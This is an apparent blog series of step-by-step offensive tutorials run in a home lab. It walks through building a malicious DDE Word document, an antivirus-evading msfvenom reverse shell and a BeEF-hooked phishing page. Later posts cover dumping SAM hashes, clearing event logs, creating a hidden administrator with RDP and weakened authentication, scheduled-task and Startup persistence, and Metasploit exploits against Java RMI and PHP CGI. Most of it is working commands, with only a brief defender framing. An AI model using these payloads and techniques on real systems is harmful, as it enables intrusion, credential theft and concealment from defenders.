Creating a Cyber Attack – Part 8 (Post Exploitation – Gaining Persistence 2)

In the final video of this series we continue with post exploitation using metasploit and meterpreter, using Windows commands to gain persistence.

We have created our new user and have remote desktop access. Now we ensure our backdoor is always running and even if it crashes or loses connection we have ways to restart it without having to interact with the victim machine.

We will then show you a post exploit module from metasploit which you can run against a machine you have access to which will test the victim for further vulnerabilities which you can use to dig deeper into the machine and possibly pivot around the network.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps to this point are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Windows commands used in this video are;

  • SCHTASKS /CREATE /TN BACKDOOR /SC HOURLY /ST 10:00 /F /RL HIGHEST /SD 22/12/2020 /ED 22/12/2030 /tr “C:\BACKDOOR.exe /RU testadmin-pc\backdoor /RP £@55w.rd
  • xcopy BACKDOOR.exe “C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”

The metasploit commands are;

  • background
  • use post/multi/recon/local_exploit_suggester
  • sessions
  • set session
  • run

We are going to create a new task which will run hourly which runs our malicious exe which in this demo is stored in the root of the C Drive.

In our command we provide a valid username and password (if you are following along from the previous video this would be our “secretuser” account and the password you specified. We also provide a name, a start and end time, schedule, location of the exe, and the credentials.

We can see our new task created successfully below. This means if we lose connection as long as the pc is in use this task will run every hour and provide us with a connection.

Now we want to look at the users startup programs and add our BACKDOOR.exe to this folder so every time the user logs in our exe will run and provide us a connection.

Our exe is currently stored in the users documents folder which is where our prompt is running from so we just need to specify where the file is and where we want to copy it to using the xcopy command.

Success. Now our exe will run whenever the user logs in.

To run the metasploit exploit suggester we need to exit from Windows and meterpreter and load the module, so we use exit, and then background our session.

We load the module using use post/multi/recon/local_exploit_suggester then we want to show options

We need the session number so we use the sessions command to find the session we want, then use set session to add it. (In our case 12)

Once this is configured we can run the exploit. It will take a while to complete, but if it finds anything it will list them as below. You can then investigate each one without having to be connected to the victim machine.

Finally we test our meterpreter connection being disconnected when the victim machine restarts, but then see a new connection created once the user logs back in.

We restart our listener using exploit/multi/handler

We see our new session (13) connect as expected.

Congratulations if you have followed this series through. You should now have a much better idea of what you are up against. This has been a beginners look at a Cyber Attack from start to finish, but we will look at more complicated and in depth aspects of Cyber Security in the future. Thanks for joining us on this journey.

Creating a Cyber Attack – Part 7 (Post Exploitation – Gaining Persistence )

In this video we continue with post exploitation using metasploit and meterpreter, but this time using Windows commands to gain persistence. We start with our meterpreter shell, then use the Windows cmd prompt to run native commands to enumerate shares and users. We will also enable RDP, and create a new user adding the account to the required groups allowing remote access using reduced authentication controls.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

Don’t forget, for an attacker information is key. The more they know the better equipped they are to find a chink in the security of the defenders network.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  • net share
  • net user
  • net user secretuser £@55w.rd /add
  • net localgroup “Administrators” secretuser /add
  • net localgroup “Remote Desktop Users” secretuser /add
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

Let’s jump in

We start from our meterpreter prompt and launch our Windows prompt using shell

Used without parameters, net share displays information about all of the resources that are shared on the local computer. We see 3 shared locations, including the “Network Share” This would be a good place to start any file searches for “passwords” “payment” etc.

Used without parameters, net user displays all of the user accounts on the local computer. We can see the six available on the victim currently, however this will soon be seven.

Let’s create a new user named “secretuser” with the password “£@55w.rd”. Now in the real world this will be named to make it blend in with other accounts, they will follow your naming standards and make sure it does not stand out.

The command completes successfully and on the victim machine we can see the new account. Now a standard user account is not much use to us at this point so we want to add it to some groups which will allow us remote access and higher permissions. In this case we add it to the “Administrators” and the “Remote Desktop Users” groups.

Both complete successfully and we again confirm on the victim machine.

To enable RDP we need to run three commands. The first enables RDP, the second sets the firewall rules and the third disables Network Level Authentication.

  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-TCP” /v UserAuthentication /t REG_DWORD /d “0” /f
  • netsh firewall set service type = remotedesktop mode = enable
  • reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer” /v fDenyConnections /t REG_DWORD /d 0 /f

All complete successfully (however we do get one message that the netsh firewall command is depreciated so I need to update myself on the new commands), so let’s test our connection.

and test our new login account.

We manage to login successfully (at the second attempt lol), but we would not want to kick off another user as this would raise suspicions so we just close the connection for now.

In the next post we continue with the last video in this series.

Creating a Cyber Attack – Part 6 (Post Exploitation – With Msf console )

In this video we continue with post exploitation, this time using metasploit and meterpreter. We have socially engineered the victim to visit our malicious webpage which has provided us with an initial connection to our victim machine, and our meterpreter shell. Now we will show a few simple commands you can use to escalate your permission level, clear logs and gather info post exploit.

If you have not read the previous guides or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

As with this entire series, the attacker machine is on the right with the victim on the left.

Commands used in this video are;

  1. getuid – shows who we are currently running as on the victim server.
  2. sysinfo – gets the details about the victim computer such as OS and name.
  3. screenshot – grabs a screenshot of the meterpreter desktop.
  4. download – downloads a selected file.
  5. upload – uploads a selected file.
  6. getsystem – uses 15 built-in methods to gain sysadmin privileges.
  7. load kiwi – mimikatz (if you don’t know what this is go have a look online) has been ported into Metasploit and when you load the extension you can use it straight from the meterpreter session.
  8. lsa_dump_sam – dumps the sam database file on screen. (uses Kiwi).
  9. ps – lists running processes on the victim machine.
  10. shell – opens a command shell on the victim machine.
  11. clearev – clears the event logs on the victim’s computer

We are on our victim machine using our Meterpreter shell, and first off we want some basic information from the machine such as the user account and OS.

Using the getuid command we can see we are running as administrator on testadmin-pc

Using the sysinfo command shows us a bit more about the host; for example that it is a 32-bit version of Windows 7 running service pack 1.

Next we take a screenshot of the desktop just out of curiosity. You never know what you might grab by chance.

Next we use the download command to steal a file named “Passwords.txt”. (Obviously in real life you will need to list and browse the victim file system looking for files of interest, but we have skipped that part in this video as it would be boring just watching me browse through directories lol!)

Note the double back slashes.

Here we can see the file saved to our root directory after being downloaded from the victims machine.

We can also upload files if we wish. If want to install a more persistent backdoor (even something like teamviewer) we can get our installer onto the target.

BACKDOOR.exe is the file we want to upload. Again note the double back slashes below.

Above we can see the file on the victims machine. (You would obviously upload to somewhere less conspicuous)

Currently we are running as administrator which is really great, but if we want to access all other user credentials on the victim machine we need to be running as system. Let’s try and elevate our privileges using the getsystem command.

Success!

Now let’s load kiwi and try and dump the SAM file. First we load kiwi

Then run lsa_dump_sam

Success! It returns 6 account names and their password hashes. (If you don’t know what to do with password hashes check out our guide on how to crack them). https://blog.2code-monte.co.uk/2020/08/02/cracking-password-hashes-hacking-rdp-servers-part-3/

If we want to look at running processes we simply use ps

Below we have highlighted our malicious process running on the victim which is our meterpreter shell.

If we want to open a Windows cmd prompt and interact with the victim machine using Windows commands we use shell.

Here we just open the windows calculator to demo, but there is much more you can do which we will cover in future guides.

All of this activity leaves a trace and we don’t want anyone knowing what we have been up to so before we go we want to delete the logs from the system. For this we have the clearev command.

We open up event viewer on the victim so you can see the logs full initially, then empty after the command has completed.

Now clearing the log is evidence in itself that something has happened on the machine, but they will not have specific events which can point them in the right direction, and some will never check event logs anyway so won’t even notice.

Hope you got something out of this, and it has helped you be more aware of what can happen on a system. There will be one more post exploitation video, and then we will start to look at how you detect, and spot this activity on your endpoints.

Creating a Cyber Attack – Part 5 (Post Exploitation – With BeeF )

In this video we pick up where we left off in Part 4. We have socially engineered our victim to visit our malicious website which has provided us with an initial connection to the victim machine. Attacker on the right, and victim on the left.

If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

We will show a few simple techniques you can use to get a meterpreter shell to get a better foothold on the machine and maybe achieve persistence (permanent connection), and gather other information from the victim machine post exploit. Our victim machine has our malicious site and Facebook open in their browser.

The BeeF modules we will be going through are;

  1. Get Clipboard
  2. Detect Social Networks
  3. Pretty Theft
  4. Fake Notification Bar
  5. Fake Flash Update

Let’s get straight into it;

Get Clipboard – This is a simple one, and is under “Hosts” in the folder structure. The module will basically grab anything that is stored on the victim machines clipboard. In our example the victim has copied their credit card number to use in a website to buy something. We select the module and run “execute”, then after it has grabbed the info it is displayed in the window as shown.

Detect Social Networks – Another self-explanatory one here. This module is below “Network” in the folder structure and allows us to see which social networks the victim is logged into (as in real life you won’t see their desktop obviously). Why do we want this? Well if you know what they are logged into you can use the next module “Pretty Theft” to steal login details. We simply click execute on this, nothing else to configure.

Pretty Theft – This module is really simple to use, and basically provides us with some login box templates which we can pop-up on the victims screen to attempt to trick them into thinking their session has expired and they need to login again. Pretty Theft is under “Social Engineering” in the folder structure, and is simple to configure offering only basic config options. In our example we know the victim is logged into Facebook so we pop-up the Facebook template, then collect the username and password in the window as shown.

We then do the same, except we change the pop-up to a Windows themed box to try and get the Windows password of the victim as well.

Fake Notification Bar (IE) – This module will show a fake notification with a message and payload of your choice at the top of the victim machines browser. We keep the standard message, but specify our custom payload which will allow us to get a meterpreter shell on the victim allowing us more access to the machine. We fire up our listener in metasploit then show the pop-up which the victim clicks and installs our malicious payload. We then check metasploit and can see we have an active connection, which we confirm by running sysinfo.

Fake Flash Update – This works in much the same way as the module above, and can also be found under Social Engineering. We provide the URL of the custom payload we want to deliver and the location of the pop-up image we wish to use, in this case Flash, but you could use any update pop-up, we are just using flash in this demo. Once you have added your URLs again just hit execute and the victim will receive your pop-up.

That’s all done in under 5 minutes, so you can see just how scary this is and how quickly it can go wrong. We are going to leave this here, and in the next video we will be covering post exploitation using Metasploit and meterpreter.

Creating a Cyber Attack – Part 4 (Exploiting – Getting Access )

In Part 4 of this series you can sit back and enjoy the fruits of your work as all we need to do now is ensure everything is running then launch our attack. We will email a link to our victim and then once the file is downloaded and opened we will see how everything fits together to exploit the victims computer. Come back for future videos when we will show some post exploitation steps we can take now we have control of our victim.

If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

First in our Kali machine we check that BeeF is running by going to our browser URL. You can also see there are no online browser sessions at present in the left hand menu.

Next we ensure our malicious website is running.

Then if have not already done so we create our listener in the metasploit framework on our attacking device so the malware has something to connect back to.

use exploit/multi/handler

Load our payload

set payload windows/meterpreter/reverse_tcp

Configure our payload, by setting the listening host (lhost) to our attacking machines IP address.

show options

set lhost 192.168.56.106

Then start the listener

run

Now we are ready. At this point the demo starts to show the victim reading the email. clicking the link, downloading the file then opening it. Activating the malware and connecting to our site.

As soon as the website opens we will have a connection in BeeF as this does not require any user interaction with the site and injects the malware automatically when the web page is visited. You will see online browsers in your web console.

In our demo you will also see us use the commands tab to launch a social engineering attack by using the “Fake notification bar” exploit built in to the console. We can use this to load additional malware onto the system by getting the user to click on the bar and accept the prompt. We will cover this in more depth in future videos.

To get our meterpreter session we need to get the victim to download our security software as advertised on our website and in the malicious document.

Once the victim has carried out these steps you will see the connection in meterpreter. We then run the sysinfo cmd to show we are on the victim machine. Again we will be showing some post exploitation steps in future videos so stay tuned for those.

As you can see from this sort series of videos there are multiple ways that malware can infect your PC, and I hope we have demystified it a little as well.

Cyber attacks will have fall back measures to provide the best odds that if a link is clicked or document opened that they will be successful, which is why we have shown 2 different methods in this demo from the same malicious document.

This has been a very simple demo showing simple methods but I hope we have helped to show the type of things that can happen.

Until next time.

Creating a Cyber Attack – Part 3 (Creating a malicious web page )

In the third video in this series we will show how to make your malicious web page. Our web page will host the malicious file, and script we prepared in Part 2. This is the website our malicious document will open which we created in Part 1.

There is not much to do in this video as we are simply copying over the payloads we have already created to our web server, and creating a basic web page where the payloads will be launched from.

We are using Kali as our web server as it comes with Apache pre-installed, however most linux web servers use the same default location for web files.

We browse to the location at “/var/www/html/” then create a new folder named “secure” which is for our new web site.

Now we copy over our secure images which we used in Part 1 to create our malicious document, the malicious exe we created in Part 2, and create a new html file named index.html.

In the video we use the cmd “gedit /var/www/html/secure/index.html”

gedit is the name of the text editing application, and /var/www/html/secure/ is the location, and index.html is the file name. NOTE: If there is already a file with that name in the specified location it will open that file, if it does not exist it will create a new file with that name.

Let’s look at the content of the index.html file. We’ve highlighted the location of the images and the payloads.

Starting at the top we have the BeeF script we created in Part 2 in the head section.

Then in the body section we have the securesystem.png image, and the secure.exe download link in the a href tags.

We have also fluffed out some content to make the page more convincing for when the victim is taken to our site.

You can copy the above html code and just replace the images and payloads with your own.

The final thing we do in the video is make sure the web server is running by using the “Service apache2 start” cmd.

Now we are ready to go to the next video where we will string everything together to see how the attack will launch against our victim when they open the document.

Creating a Cyber Attack – Part 2 (Creating Malware Payloads )

In part one we created our Word document which will run the initial stage, and here in part 2 we will be creating the two malicious payloads which will be used in our malicious web page which we will make in part 3.

We will be using Beef to make use of it’s browser hook which runs javascript on the page load to attempt to “hook” the victims browser.

We will also be using msfvenom to create a malicious exe which we will make available on our malicious website and attempt to “socially engineer” the victim into downloading and installing it.

What you need;

  1. Kali linux (comes pre-installed with both Beef and msfvenom)
  2. Beef
  3. msfvenom
  4. Less than 5 minutes

Login to Kali and open two terminal windows.

First off let’s get Beef running, in kali we simply type “beef-xss” and you should see the following output once it has started. The first time you run this you should also be prompted to create a password. Obviously note this for logging in later.

Copy the script as highlighted above, you will need this for part 3.

The browser will also automatically open to provide access to Beef’s Gui which we will monitor for victims once our site is live. If it shows an error message “unable to connect”, wait a few minutes then refresh the browser window and you should see the login screen. Note this url (also shown in the screen shot above)

Login and have a look around, it’s a great tool and we will use it in other videos.

Now let’s move on to making our malicious exe.

In our next window we are going to paste a prepared cmd into the terminal shown below;

Let’s break this down to help you better understand what we are doing;

  1. msfvenom – this is what we are using to create our payload
  2. –platform windows – the payload is targeted to Windows operating systems
  3. –arch x86 – our exe will be 32-bit
  4. -p windows/meterpreter/reverse_tcp – the malicious payload will be a reverse meterpreter shell we can connect to using metasploit.
  5. -e x86/shikata_ga_nai – specifies the encoder we want to use for the payload
  6. -i 5 – specifies the number of iterations of encoding. (The better the encoding the more likely it will bypass anti-virus protections)
  7. -b ‘\x00’ – specifies to avoid bad characters while encoding, in this case we want to avoid null.
  8. LHOST=192.168.56.106 LPORT=4444 – this is the IP and port of the machine we wish to connect back to from the victim. (Our attacking machine).
  9. -f exe– this is the file type we wish to create
  10. > secure.exe – and finally the file name we are creating.

If it is successfully created we should see the below message.

Save this file somewhere ready to upload to our server.

That’s it, we have our 2 payloads ready to use in our malicious website. See you soon for part 3.

Creating a Cyber Attack – Part 1 (Making a malicious Word document using DDE)

In this new series we are going to be making a malicious Word document, which will connect to our malicious site and automatically run malicious code to give us access to the victim, but also give us a fall back where the user is also prompted to install a secure file viewer should our automatic code not run. This gives us 2 chances to infect the victim machine.

Office documents allow us to execute code, in the same way as a website would, so using some simple scripting we can create a document which when opened auto prompts the user to click a pop up, and then automatically connect to our malicious website to download and run Malware.

If you are a defender the most important thing to understand is how attacks like this work so you know what you are looking out for. With that in mind, let’s go make some Malware.

In part one we are only creating the document itself, adding some images and text to try and socially engineer the victim user into thinking it is legitimate and click the pop up box. Also to test that the script works and opens a website. In this demo we will be using http://legitimate.website.com which is just a test site for this demo, so you will need a different website to open. At this point we are just testing the script opens a web page so if you don’t have a website you can just use https://google.com.

What you need;

  1. Microsoft Word
  2. Some free security images downloaded from the internet
  3. Some made up text to put in the document
  4. A Windows pop up screenshot
  5. This piece of code; DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “
  6. Less than 5 minutes.

Open up Word and create a simple looking document which will tempt your victim to accept the pop up when they see it. Pop some images in, and be creative with the text in the document. Ours is shown below.

Now we need to insert the script which will open the website when the pop up is clicked.

Move the cursor down the page and then click “Insert” from the ribbon menu, then “quick parts” then “Field” from the drop down menu. Ensure “=(Formula)” is selected then click OK.

Then you should see the below in your document. This is our formula field

Right click and choose “Toggle Field Code”

Then you’ll see this;

Clear the code and insert our code as shown

DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “

Save and close the document, then to test re open on your machine. If the website opens as in the video you are ready to move on to the next step.

Hacking web servers – Apache PHP CGI (Easy Hacking)

Apache is widely used on hundreds of thousands of web servers across the internet. Therefore the chances of finding Apache servers which are running older versions is highly likely, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for older versions and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV -sT –version-all -p 80 192.168.56.103

There is a great cheat sheet here for nmap cmds to help better understand what we are doing; https://www.stationx.net/nmap-cheat-sheet/

This shows us that port 80- is open, that it is running Apache and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that as the first part denotes the year is was discovered.

Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.

I’m not going to teach you how to google…….but my search brought up a vulnerability in a php cgi script which was the default for that version of Apache. There will be loads of exploits available for this version due to it’s age, we just decided to use this one as it is super reliable for the video demo.

Let’s fire up metasploit and find it.

search type:exploit multi/http/php

We could has also searched by date. Anyway, the one we want is number 0 so we simply type

use 0

It has already configured a payload for us so we check the info on the exploit

show info

Once we’re happy we check which options we need to add to allow it to run.

show options

We can see in the options what is required and what is not by reading the “required” column.

The port is correct (80) we need to add RHOSTS and LHOST
  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want.

Hacking web servers – Java (Easy Hacking)

Java is rarely updating on web servers and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV 192.168.56.103

We can see Java RMI running on port 1099

Next we head over to the metasploit framework to search for any built in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self explanatory, we are performing a search with a type of “exploit” for the platform “java” and addition item “rmi”. We recieve the following output;

See the highlighted module we will use

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload so next we list the “info” page

info

Then once we are happy we know what we need to configure we load the options

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.

  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want. All because no one updated Java!